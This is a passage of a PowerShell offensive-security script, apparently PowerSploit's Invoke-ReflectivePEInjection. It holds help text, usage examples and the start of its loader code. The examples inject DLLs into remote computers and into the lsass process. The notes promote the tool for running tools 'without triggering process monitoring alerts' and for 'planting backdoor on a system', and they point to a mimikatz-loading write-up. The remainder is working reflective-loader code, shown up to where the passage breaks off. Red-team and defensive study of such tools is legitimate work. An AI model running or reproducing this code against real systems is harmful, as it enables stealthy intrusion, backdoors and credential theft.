DoNotZeroMZ\n\nOptional, will not wipe the MZ from the first two bytes of the PE. This is to be used primarily for testing purposes and to enable loading the same PE with Invoke-ReflectivePEInjection more than once.\n\n.EXAMPLE\n\nLoad DemoDLL and run the exported function WStringFunc on Target.local, print the wchar_t* returned by WStringFunc().\n$PEBytes = [IO.File]::ReadAllBytes('DemoDLL.dll')\nInvoke-ReflectivePEInjection -PEBytes $PEBytes -FuncReturnType WString -ComputerName Target.local\n\n.EXAMPLE\n\nLoad DemoDLL and run the exported function WStringFunc on all computers in the file targetlist.txt. Print\n    the wchar_t* returned by WStringFunc() from all the computers.\n$PEBytes = [IO.File]::ReadAllBytes('DemoDLL.dll')\nInvoke-ReflectivePEInjection -PEBytes $PEBytes -FuncReturnType WString -ComputerName (Get-Content targetlist.txt)\n\n.EXAMPLE\n\nLoad DemoEXE and run it locally.\n$PEBytes = [IO.File]::ReadAllBytes('DemoEXE.exe')\nInvoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs \"Arg1 Arg2 Arg3 Arg4\"\n\n.EXAMPLE\n\nLoad DemoEXE and run it locally. Forces ASLR on for the EXE.\n$PEBytes = [IO.File]::ReadAllBytes('DemoEXE.exe')\nInvoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs \"Arg1 Arg2 Arg3 Arg4\" -ForceASLR\n\n.EXAMPLE\n\nRefectively load DemoDLL_RemoteProcess.dll in to the lsass process on a remote computer.\n$PEBytes = [IO.File]::ReadAllBytes('DemoDLL_RemoteProcess.dll')\nInvoke-ReflectivePEInjection -PEBytes $PEBytes -ProcName lsass -ComputerName Target.Local\n\n.NOTES\nGENERAL NOTES:\nThe script has 3 basic sets of functionality:\n1.) Reflectively load a DLL in to the PowerShell process\n    -Can return DLL output to user when run remotely or locally.\n    -Cleans up memory in the PS process once the DLL finishes executing.\n    -Great for running pentest tools on remote computers without triggering process monitoring alerts.\n    -By default, takes 3 function names, see below (DLL LOADING NOTES) for more info.\n2.) Reflectively load an EXE in to the PowerShell process.\n    -Can NOT return EXE output to user when run remotely. If remote output is needed, you must use a DLL. CAN return EXE output if run locally.\n    -Cleans up memory in the PS process once the DLL finishes executing.\n    -Great for running existing pentest tools which are EXE's without triggering process monitoring alerts.\n3.) Reflectively inject a DLL in to a remote process.\n    -Can NOT return DLL output to the user when run remotely OR locally.\n    -Does NOT clean up memory in the remote process if/when DLL finishes execution.\n    -Great for planting backdoor on a system by injecting backdoor DLL in to another processes memory.\n    -Expects the DLL to have this function: void VoidFunc(). This is the function that will be called after the DLL is loaded.\n\nDLL LOADING NOTES:\n\nPowerShell does not capture an applications output if it is output using stdout, which is how Windows console apps output.\nIf you need to get back the output from the PE file you are loading on remote computers, you must compile the PE file as a DLL, and have the DLL\nreturn a char* or wchar_t*, which PowerShell can take and read the output from. Anything output from stdout which is run using powershell\nremoting will not be returned to you. If you just run the PowerShell script locally, you WILL be able to see the stdout output from\napplications because it will just appear in the console window. The limitation only applies when using PowerShell remoting.\n\nFor DLL Loading:\nOnce this script loads the DLL, it calls a function in the DLL. There is a section near the bottom labeled \"YOUR CODE GOES HERE\"\nI recommend your DLL take no parameters. I have prewritten code to handle functions which take no parameters are return\nthe following types: char*, wchar_t*, and void. If the function returns char* or wchar_t* the script will output the\nreturned data. The FuncReturnType parameter can be used to specify which return type to use. The mapping is as follows:\nwchar_t*   : FuncReturnType = WString\nchar*      : FuncReturnType = String\nvoid       : Default, don't supply a FuncReturnType\n\nFor the whcar_t* and char_t* options to work, you must allocate the string to the heap. Don't simply convert a string\nusing string.c_str() because it will be allocaed on the stack and be destroyed when the DLL returns.\n\nThe function name expected in the DLL for the prewritten FuncReturnType's is as follows:\nWString    : WStringFunc\nString     : StringFunc\nVoid       : VoidFunc\n\nThese function names ARE case sensitive. To create an exported DLL function for the wstring type, the function would\nbe declared as follows:\nextern \"C\" __declspec( dllexport ) wchar_t* WStringFunc()\n\n\nIf you want to use a DLL which returns a different data type, or which takes parameters, you will need to modify\nthis script to accomodate this. You can find the code to modify in the section labeled \"YOUR CODE GOES HERE\".\n\nFind a DemoDLL at: https://github.com/clymb3r/PowerShell/tree/master/Invoke-ReflectiveDllInjection\n\n.LINK\n\nhttp://clymb3r.wordpress.com/2013/04/06/reflective-dll-injection-with-powershell/\n\nBlog on modifying mimikatz for reflective loading: http://clymb3r.wordpress.com/2013/04/09/modifying-mimikatz-to-be-loaded-using-invoke-reflectivedllinjection-ps1/\nBlog on using this script as a backdoor with SQL server: http://www.casaba.com/blog/\n#>\n\n[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseApprovedVerbs', '')]\n[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseSingularNouns', '')]\n[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')]\n[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSPossibleIncorrectComparisonWithNull', '')]\n[CmdletBinding()]\nParam(\n    [Parameter(Position = 0, Mandatory = $true)]\n    [ValidateNotNullOrEmpty()]\n    [Byte[]]\n    $PEBytes,\n\n    [Parameter(Position = 1)]\n    [String[]]\n    $ComputerName,\n\n    [Parameter(Position = 2)]\n    [ValidateSet( 'WString', 'String', 'Void' )]\n    [String]\n    $FuncReturnType = 'Void',\n\n    [Parameter(Position = 3)]\n    [String]\n    $ExeArgs,\n\n    [Parameter(Position = 4)]\n    [Int32]\n    $ProcId,\n\n    [Parameter(Position = 5)]\n    [String]\n    $ProcName,\n\n    [Switch]\n    $ForceASLR,\n\n    [Switch]\n    $DoNotZeroMZ\n)\n\nSet-StrictMode -Version 2\n\n\n$RemoteScriptBlock = {\n    [CmdletBinding()]\n    Param(\n        [Parameter(Position = 0, Mandatory = $true)]\n        [Byte[]]\n        $PEBytes,\n\n        [Parameter(Position = 1, Mandatory = $true)]\n        [String]\n        $FuncReturnType,\n\n        [Parameter(Position = 2, Mandatory = $true)]\n        [Int32]\n        $ProcId,\n\n        [Parameter(Position = 3, Mandatory = $true)]\n        [String]\n        $ProcName,\n\n        [Parameter(Position = 4, Mandatory = $true)]\n        [Bool]\n        $ForceASLR\n    )\n\n    ###################################\n    ##########  Win32 Stuff  ##########\n    ###################################\n    Function Get-Win32Types\n    {\n        $Win32Types = New-Object System.Object\n\n        #Define all the structures/enums that will be used\n        #   This article shows you how to do this with reflection: http://www.exploit-monday.com/2012/07/structs-and-enums-using-reflection.html\n        $Domain = [AppDomain]::CurrentDomain\n        $DynamicAssembly = New-Object System.Reflection.AssemblyName('DynamicAssembly')\n        $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynamicAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)\n        $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('DynamicModule', $false)\n        $ConstructorInfo = [System.Runtime.InteropServices.MarshalAsAttribute].GetConstructors()[0]\n\n\n        ############    ENUM    ############\n        #Enum MachineType\n        $TypeBuilder = $ModuleBuilder.DefineEnum('MachineType', 'Public', [UInt16])\n        $TypeBuilder.DefineLiteral('Native', [UInt16] 0) | Out-Null\n        $TypeBuilder.DefineLiteral('I386', [UInt16] 0x014c) | Out-Null\n        $TypeBuilder.DefineLiteral('Itanium', [UInt16] 0x0200) | Out-Null\n        $TypeBuilder.DefineLiteral('x64', [UInt16] 0x8664) | Out-Null\n        $MachineType = $TypeBuilder.CreateType()\n        $Win32Types | Add-Member -MemberType NoteProperty -Name MachineType -Value $MachineType\n\n        #Enum MagicType\n        $TypeBuilder = $ModuleBuilder.DefineEnum('MagicType', 'Public', [UInt16])\n        $TypeBuilder.DefineLiteral('IMAGE_NT_OPTIONAL_HDR32_MAGIC', [UInt16] 0x10b) | Out-Null\n        $TypeBuilder.DefineLiteral('IMAGE_NT_OPTIONAL_HDR64_MAGIC', [UInt16] 0x20b) | Out-Null\n        $MagicType = $TypeBuilder.CreateType()\n        $Win32Types | Add-Member -MemberType NoteProperty -Name MagicType -Value $MagicType\n\n        #Enum SubSystemType\n        $TypeBuilder = $ModuleBuilder.DefineEnum('SubSystemType', 'Public', [UInt16])\n        $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_UNKNOWN', [UInt16] 0) | Out-Null\n        $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_NATIVE', [UInt16] 1) | Out-Null\n        $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_GUI', [UInt16] 2) | Out-Null\n        $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_CUI', [UInt16] 3) | Out-Null\n        $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_POSIX_CUI', [UInt16] 7) | Out-Null\n        $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_CE_GUI', [UInt16] 9) | Out-Null\n        $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_APPLICATION', [UInt16] 10) | Out-Null\n        $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_BOOT_SERVICE_DRIVER', [UInt16] 11) | Out-Null\n        $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_RUNTIME_DRIVER', [UInt16] 12) | Out-Null\n        $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_ROM', [UInt16] 13) | Out-Null\n        $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_XBOX', [UInt16] 14) | Out-Null\n        $SubSystemType = $TypeBuilder.CreateType()\n        $Win32Types | Add-Member -MemberType NoteProperty -Name SubSystemType -Value $SubSystemType\n\n        #Enum DllCharacteristicsType\n        $TypeBuilder = $ModuleBuilder.DefineEnum('DllCharacteristicsType', 'Public', [UInt16])\n        $TypeBuilder.DefineLiteral('RES_0', [UInt16] 0x0001) | Out-Null\n        $TypeBuilder.DefineLiteral('RES_1', [UInt16] 0x0002) | Out-Null\n        $TypeBuilder.DefineLiteral('RES_2', [UInt16] 0x0004) | Out-Null\n        $TypeBuilder.DefineLiteral('RES_3', [UInt16] 0x0008) | Out-Null\n        $TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_DYNAMIC_BASE', [UInt16] 0x0040) | Out-Null\n        $TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_FORCE_INTEGRITY', [UInt16] 0x0080) | Out-Null\n        $TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_NX_COMPAT', [UInt16] 0x0100) | Out-Null\n        $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_ISOLATION', [UInt16] 0x0200) | Out-Null\n        $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_SEH', [UInt16] 0x0400) | Out-Null\n        $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_BIND', [UInt16] 0x0800) | Out-Null\n        $TypeBuilder.DefineLiteral('RES_4', [UInt16] 0x1000) | Out-Null\n        $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_WDM_DRIVER', [UInt16] 0x2000) | Out-Null\n        $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE', [UInt16] 0x8000) | Out-Null\n        $DllCharacteristicsType = $TypeBuilder.CreateType()\n        $Win32Types | Add-Member -MemberType NoteProperty -Name DllCharacteristicsType -Value $DllCharacteristicsType\n\n        ###########    STRUCT    ###########\n        #Struct IMAGE_DATA_DIRECTORY\n        $Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit'\n        $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_DATA_DIRECTORY', $Attributes, [System.ValueType], 8)\n        ($TypeBuilder.DefineField('VirtualAddress', [UInt32], 'Public')).SetOffset(0) | Out-Null\n        ($TypeBuilder.DefineField('Size', [UInt32], 'Public')).SetOffset(4) | Out-Null\n        $IMAGE_DATA_DIRECTORY = $TypeBuilder.CreateType()\n        $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_DATA_DIRECTORY -Value $IMAGE_DATA_DIRECTORY\n\n        #Struct IMAGE_FILE_HEADER\n        $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n        $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_FILE_HEADER', $Attributes, [System.ValueType], 20)\n        $TypeBuilder.DefineField('Machine', [UInt16], 'Public') | Out-Null\n        $TypeBuilder.DefineField('NumberOfSections', [UInt16], 'Public') | Out-Null\n        $TypeBuilder.DefineField('TimeDateStamp', [UInt32], 'Public') | Out-Null\n        $TypeBuilder.DefineField('PointerToSymbolTable', [UInt32], 'Public') | Out-Null\n        $TypeBuilder.DefineField('NumberOfSymbols', [UInt32], 'Public') | Out-Null\n        $TypeBuilder.DefineField('SizeOfOptionalHeader', [UInt16], 'Public') | Out-Null\n        $TypeBuilder.DefineField('Characteristics', [UInt16], 'Public') | Out-Null\n        $IMAGE_FILE_HEADER = $TypeBuilder.CreateType()\n        $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_HEADER -Value $IMAGE_FILE_HEADER\n\n        #Struct IMAGE_OPTIONAL_HEADER64\n        $Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit'\n        $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_OPTIONAL_HEADER64', $Attributes, [System.ValueType], 240)\n        ($TypeBuilder.DefineField('Magic', $MagicType, 'Public')).SetOffset(0) | Out-Null\n        ($TypeBuilder.DefineField('MajorLinkerVersion', [Byte], 'Public')).SetOffset(2) | Out-Null\n        ($TypeBuilder.DefineField('MinorLinkerVersion', [Byte], 'Public')).SetOffset(3) | Out-Null\n        ($TypeBuilder.DefineField('SizeOfCode', [UInt32], 'Public')).SetOffset(4) | Out-Null\n        ($TypeBuilder.DefineField('SizeOfInitializedData', [UInt32], 'Public')).SetOffset(8) | Out-Null\n        ($TypeBuilder.DefineField('SizeOfUninitializedData', [UInt32], 'Public')).SetOffset(12) | Out-Null\n        ($TypeBuilder.DefineField('AddressOfEntryPoint', [UInt32], 'Public')).SetOffset(16) | Out-Null\n        ($TypeBuilder.DefineField('BaseOfCode', [UInt32], 'Public')).SetOffset(20) | Out-Null\n        ($TypeBuilder.DefineField('ImageBase', [UInt64], 'Public')).SetOffset(24) | Out-Null\n        ($TypeBuilder.DefineField('SectionAlignment', [UInt32], 'Public')).SetOffset(32) | Out-Null\n        ($TypeBuilder.DefineField('FileAlignment', [UInt32], 'Public')).SetOffset(36) | Out-Null\n        ($TypeBuilder.DefineField('MajorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(40) | Out-Null\n        ($TypeBuilder.DefineField('MinorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(42) | Out-Null\n        ($TypeBuilder.DefineField('MajorImageVersion', [UInt16], 'Public')).SetOffset(44) | Out-Null\n        ($TypeBuilder.DefineField('MinorImageVersion', [UInt16], 'Public')).SetOffset(46) | Out-Null\n        ($TypeBuilder.DefineField('MajorSubsystemVersion', [UInt16], 'Public')).SetOffset(48) | Out-Null\n        ($TypeBuilder.DefineField('MinorSubsystemVersion', [UInt16], 'Public')).SetOffset(50) | Out-Null\n        ($TypeBuilder.DefineField('Win32VersionValue', [UInt32], 'Public')).SetOffset(52) | Out-Null\n        ($TypeBuilder.DefineField('SizeOfImage', [UInt32], 'Public')).SetOffset(56) | Out-Null\n        ($TypeBuilder.DefineField('SizeOfHeaders', [UInt32], 'Public')).SetOffset(60) | Out-Null\n        ($TypeBuilder.DefineField('CheckSum', [UInt32], 'Public')).SetOffset(64) | Out-Null\n        ($TypeBuilder.DefineField('Subsystem', $SubSystemType, 'Public')).SetOffset(68) | Out-Null\n        ($TypeBuilder.DefineField('DllCharacteristics', $DllCharacteristicsType, 'Public')).SetOffset(70) | Out-Null\n        ($TypeBuilder.DefineField('SizeOfStackReserve', [UInt64], 'Public')).SetOffset(72) | Out-Null\n        ($TypeBuilder.DefineField('SizeOfStackCommit', [UInt64], 'Public')).SetOffset(80) | Out-Null\n        ($TypeBuilder.DefineField('SizeOfHeapReserve', [UInt64], 'Public')).SetOffset(88) | Out-Null\n        ($TypeBuilder.DefineField('SizeOfHeapCommit', [UInt64], 'Public')).SetOffset(96) | Out-Null\n        ($TypeBuilder.DefineField('LoaderFlags', [UInt32], 'Public')).SetOffset(104) | Out-Null\n        ($TypeBuilder.DefineField('NumberOfRvaAndSizes', [UInt32], 'Public')).SetOffset(108) | Out-Null\n        ($TypeBuilder.DefineField('ExportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(112) | Out-Null\n        ($TypeBuilder.DefineField('ImportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(120) | Out-Null\n        ($TypeBuilder.DefineField('ResourceTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(128) | Out-Null\n        ($TypeBuilder.DefineField('ExceptionTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(136) | Out-Null\n        ($TypeBuilder.DefineField('CertificateTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(144) | Out-Null\n        ($TypeBuilder.DefineField('BaseRelocationTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(152) | Out-Null\n        ($TypeBuilder.DefineField('Debug', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(160) | Out-Null\n        ($TypeBuilder.DefineField('Architecture', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(168) | Out-Null\n        ($TypeBuilder.DefineField('GlobalPtr', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(176) | Out-Null\n        ($TypeBuilder.DefineField('TLSTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(184) | Out-Null\n        ($TypeBuilder.DefineField('LoadConfigTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(192) | Out-Null\n        ($TypeBuilder.DefineField('BoundImport', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(200) | Out-Null\n        ($TypeBuilder.DefineField('IAT', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(208) | Out-Null\n        ($TypeBuilder.DefineField('DelayImportDescriptor', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(216) | Out-Null\n        ($TypeBuilder.DefineField('CLRRuntimeHeader', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(224) | Out-Null\n        ($TypeBuilder.DefineField('Reserved', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(232) | Out-Null\n        $IMAGE_OPTIONAL_HEADER64 = $TypeBuilder.CreateType()\n        $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_OPTIONAL_HEADER64 -Value $IMAGE_OPTIONAL_HEADER64\n\n        #Struct IMAGE_OPTIONAL_HEADER32\n        $Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit'\n        $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_OPTIONAL_HEADER32', $Attributes, [System.ValueType], 224)\n        ($TypeBuilder.DefineField('Magic', $MagicType, 'Public')).SetOffset(0) | Out-Null\n        ($TypeBuilder.DefineField('MajorLinkerVersion', [Byte], 'Public')).SetOffset(2) | Out-Null\n        ($TypeBuilder.DefineField('MinorLinkerVersion', [Byte], 'Public')).SetOffset(3) | Out-Null\n        ($TypeBuilder.DefineField('SizeOfCode', [UInt32], 'Public')).SetOffset(4) | Out-Null\n        ($TypeBuilder.DefineField('SizeOfInitializedData', [UInt32], 'Public')).SetOffset(8) | Out-Null\n        ($TypeBuilder.DefineField('SizeOfUninitializedData', [UInt32], 'Public')).SetOffset(12) | Out-Null\n        ($TypeBuilder.DefineField('AddressOfEntryPoint', [UInt32], 'Public')).SetOffset(16) | Out-Null\n        ($TypeBuilder.DefineField('BaseOfCode', [UInt32], 'Public')).SetOffset(20) | Out-Null\n        ($TypeBuilder.DefineField('BaseOfData', [UInt32], 'Public')).SetOffset(24) | Out-Null\n        ($TypeBuilder.DefineField('ImageBase', [UInt32], 'Public')).SetOffset(28) | Out-Null\n        ($TypeBuilder.DefineField('SectionAlignment', [UInt32], 'Public')).SetOffset(32) | Out-Null\n        ($TypeBuilder.DefineField('FileAlignment', [UInt32], 'Public')).SetOffset(36) | Out-Null\n        ($TypeBuilder.DefineField('MajorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(40) | Out-Null\n        ($TypeBuilder.DefineField('MinorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(42) | Out-Null\n        ($TypeBuilder.DefineField('MajorImageVersion', [UInt16], 'Public')).SetOffset(44) | Out-Null\n        ($TypeBuilder.DefineField('MinorImageVersion', [UInt16], 'Public')).SetOffset(46) | Out-Null\n        ($TypeBuilder.DefineField('MajorSubsystemVersion', [UInt16], 'Public')).SetOffset(48) | Out-Null\n        ($TypeBuilder.DefineField('MinorSubsystemVersion', [UInt16], 'Public')).SetOffset(50) | Out-Null\n        ($TypeBuilder.DefineField('Win32VersionValue', [UInt32], 'Public')).SetOffset(52) | Out-Null\n        ($TypeBuilder.DefineField('SizeOfImage', [UInt32], 'Public')).SetOffset(56) | Out-Null\n        ($TypeBuilder.DefineField('SizeOfHeaders', [UInt32], 'Public')).SetOffset(60) | Out-Null\n        ($TypeBuilder.DefineField('CheckSum', [UInt32], 'Public')).SetOffset(64) | Out-Null\n        ($TypeBuilder.DefineField('Subsystem', $SubSystemType, 'Public')).SetOffset(68) | Out-Null\n        ($TypeBuilder.DefineField('DllCharacteristics', $DllCharacteristicsType, 'Public')).SetOffset(70) | Out-Null\n        ($TypeBuilder.DefineField('SizeOfStackReserve', [UInt32], 'Public')).SetOffset(72) | Out-Null\n        ($TypeBuilder.DefineField('SizeOfStackCommit', [UInt32], 'Public')).SetOffset(76) | Out-Null\n        ($TypeBuilder.DefineField('SizeOfHeapReserve', [UInt32], 'Public')).SetOffset(80) | Out-Null\n        ($TypeBuilder.DefineField('SizeOfHeapCommit', [UInt32], 'Public')).SetOffset(84) | Out-Null\n        ($TypeBuilder.DefineField('LoaderFlags', [UInt32], 'Public')).SetOffset(88) | Out-Null\n        ($TypeBuilder.DefineField('NumberOfRvaAndSizes', [UInt32], 'Public')).SetOffset(92) | Out-Null\n        ($TypeBuilder.DefineField('ExportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(96) | Out-Null\n        ($TypeBuilder.DefineField('ImportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(104) | Out-Null\n        ($TypeBuilder.DefineField('ResourceTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(112) | Out-Null\n        ($TypeBuilder.DefineField('ExceptionTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(120) | Out-Null\n        ($TypeBuilder.DefineField('CertificateTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(128) | Out-Null\n        ($TypeBuilder.DefineField('BaseRelocationTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(136) | Out-Null\n        ($TypeBuilder.DefineField('Debug', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(144) | Out-Null\n        ($TypeBuilder.DefineField('Architecture', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(152) | Out-Null\n        ($TypeBuilder.DefineField('GlobalPtr', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(160) | Out-Null\n        ($TypeBuilder.DefineField('TLSTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(168) | Out-Null\n        ($TypeBuilder.DefineField('LoadConfigTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(176) | Out-Null\n        ($TypeBuilder.DefineField('BoundImport', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(184) | Out-Null\n        ($TypeBuilder.DefineField('IAT', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(192) | Out-Null\n        ($TypeBuilder.DefineField('DelayImportDescriptor', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(200) | Out-Null\n        ($TypeBuilder.DefineField('CLRRuntimeHeader', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(208) | Out-Null\n        ($TypeBuilder.DefineField('Reserved', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(216) | Out-Null\n        $IMAGE_OPTIONAL_HEADER32 = $TypeBuilder.CreateType()\n        $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_OPTIONAL_HEADER32 -Value $IMAGE_OPTIONAL_HEADER32\n\n        #Struct IMAGE_NT_HEADERS64\n        $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n        $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_NT_HEADERS64', $Attributes, [System.ValueType], 264)\n        $TypeBuilder.DefineField('Signature', [UInt32], 'Public') | Out-Null\n        $TypeBuilder.DefineField('FileHeader', $IMAGE_FILE_HEADER, 'Public') | Out-Null\n        $TypeBuilder.DefineField('OptionalHeader', $IMAGE_OPTIONAL_HEADER64, 'Public') | Out-Null\n        $IMAGE_NT_HEADERS64 = $TypeBuilder.CreateType()\n        $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS64 -Value $IMAGE_NT_HEADERS64\n\n        #Struct IMAGE_NT_HEADERS32\n        $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n        $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_NT_HEADERS32', $Attributes, [System.ValueType], 248)\n        $TypeBuilder.DefineField('Signature', [UInt32], 'Public') | Out-Null\n        $TypeBuilder.DefineField('FileHeader', $IMAGE_FILE_HEADER, 'Public') | Out-Null\n        $TypeBuilder.DefineField('OptionalHeader', $IMAGE_OPTIONAL_HEADER32, 'Public') | Out-Null\n        $IMAGE_NT_HEADERS32 = $TypeBuilder.CreateType()\n        $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS32 -Value $IMAGE_NT_HEADERS32\n\n        #Struct IMAGE_DOS_HEADER\n        $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n        $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_DOS_HEADER', $Attributes, [System.ValueType], 64)\n        $TypeBuilder.DefineField('e_magic', [UInt16], 'Public') | Out-Null\n        $TypeBuilder.DefineField('e_cblp', [UInt16], 'Public') | Out-Null\n        $TypeBuilder.DefineField('e_cp', [UInt16], 'Public') | Out-Null\n        $TypeBuilder.DefineField('e_crlc', [UInt16], 'Public') | Out-Null\n        $TypeBuilder.DefineField('e_cparhdr', [UInt16], 'Public') | Out-Null\n        $TypeBuilder.DefineField('e_minalloc', [UInt16], 'Public') | Out-Null\n        $TypeBuilder.DefineField('e_maxalloc', [UInt16], 'Public') | Out-Null\n        $TypeBuilder.DefineField('e_ss', [UInt16], 'Public') | Out-Null\n        $TypeBuilder.DefineField('e_sp', [UInt16], 'Public') | Out-Null\n        $TypeBuilder.DefineField('e_csum', [UInt16], 'Public') | Out-Null\n        $TypeBuilder.DefineField('e_ip', [UInt16], 'Public') | Out-Null\n        $TypeBuilder.DefineField('e_cs', [UInt16], 'Public') | Out-Null\n        $TypeBuilder.DefineField('e_lfarlc', [UInt16], 'Public') | Out-Null\n        $TypeBuilder.DefineField('e_ovno', [UInt16], 'Public') | Out-Null\n\n        $e_resField = $TypeBuilder.DefineField('e_res', [UInt16[]], 'Public, HasFieldMarshal')\n        $ConstructorValue = [System.Runtime.InteropServices.UnmanagedType]::ByValArray\n        $FieldArray = @([System.Runtime.InteropServices.MarshalAsAttribute].GetField('SizeConst'))\n        $AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 4))\n        $e_resField.SetCustomAttribute($AttribBuilder)\n\n        $TypeBuilder.DefineField('e_oemid', [UInt16], 'Public') | Out-Null\n        $TypeBuilder.DefineField('e_oeminfo', [UInt16], 'Public') | Out-Null\n\n        $e_res2Field = $TypeBuilder.DefineField('e_res2', [UInt16[]], 'Public, HasFieldMarshal')\n        $ConstructorValue = [System.Runtime.InteropServices.UnmanagedType]::ByValArray\n        $AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 10))\n        $e_res2Field.SetCustomAttribute($AttribBuilder)\n\n        $TypeBuilder.DefineField('e_lfanew', [Int32], 'Public') | Out-Null\n        $IMAGE_DOS_HEADER = $TypeBuilder.CreateType()\n        $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_DOS_HEADER -Value $IMAGE_DOS_HEADER\n\n        #Struct IMAGE_SECTION_HEADER\n        $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n        $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_SECTION_HEADER', $Attributes, [System.ValueType], 40)\n\n        $nameField = $TypeBuilder.DefineField('Name', [Char[]], 'Public, HasFieldMarshal')\n        $ConstructorValue = [System.Runtime.InteropServices.UnmanagedType]::ByValArray\n        $AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 8))\n        $nameField.SetCustomAttribute($AttribBuilder)\n\n        $TypeBuilder.DefineField('VirtualSize', [UInt32], 'Public') | Out-Null\n        $TypeBuilder.DefineField('VirtualAddress', [UInt32], 'Public') | Out-Null\n        $TypeBuilder.DefineField('SizeOfRawData', [UInt32], 